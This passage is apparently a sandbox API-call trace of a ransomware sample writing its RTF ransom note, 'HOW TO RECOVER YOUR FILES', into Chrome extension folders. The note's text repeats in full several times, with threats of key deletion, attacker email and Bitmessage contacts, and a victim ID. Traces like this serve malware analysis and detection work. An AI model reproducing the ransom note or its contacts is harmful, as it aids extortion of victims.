R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.220] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.221] CloseHandle (hObject=0x2ec) returned 1 [0291.221] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\#readme_eman#.rtf")) returned 0xffffffff [0291.221] GetLastError () returned 0x2 [0291.221] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.222] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.222] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.222] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! 